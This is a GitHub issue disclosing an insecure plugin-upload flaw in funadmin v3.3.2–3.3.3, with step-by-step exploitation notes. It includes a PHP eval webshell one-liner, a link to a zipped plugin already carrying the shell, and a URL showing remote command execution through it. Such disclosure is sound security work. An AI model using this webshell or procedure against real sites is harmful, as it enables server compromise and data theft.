Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Insecure file upload via plugins install in funadmin v3.3.2 - v3.3.3 #17

Open
Leeyangee opened this issue Jun 8, 2023 · 1 comment
Open

Comments

@Leeyangee
Copy link

Leeyangee commented Jun 8, 2023

Vulnerability Product:funadmin
Vulnerability version:.3.3.2 - 3.3.3
Vulnerability type:Insecure file upload
Vulnerability Details:
Vulnerability location app\backend\controller\Addon.php#localinstall method

the method:localinstall doesn't check any webshell or sensitive function in file, which may cause insecure file upload.
image
firstly, we download a free plugin and unzip it. the rootpath of plugin is as follows:
image
then, we add a webshell into /public/js
image
content of shell: <?pup @eval($_REQUEST['shell']); ?>
after it, we zip the entire plugin
image
example plugin(already placed webshell): https://github.com/Leeyangee/leeya_bug/raw/main/demo.zip

finally, we just find a website uses funadmin v3.3.2, visit: http://localhost/backend/index/index.html, click "install offline" "离线安装"
image
and select the plugin we just zipped, after installed , visit http://localhost/static/demo/js/shell.php?shell=phpinfo();
image
Proof that this has been uploaded webshell via plugins install

Discoverer:leeya_bug

@funadmin
Copy link
Owner

funadmin commented Jun 8, 2023 via email

@Leeyangee Leeyangee changed the title Insecure file upload via plugins install in funadmin v3.3.2 Insecure file upload via plugins install in funadmin v3.3.2 - v3.3.3 Jun 13, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants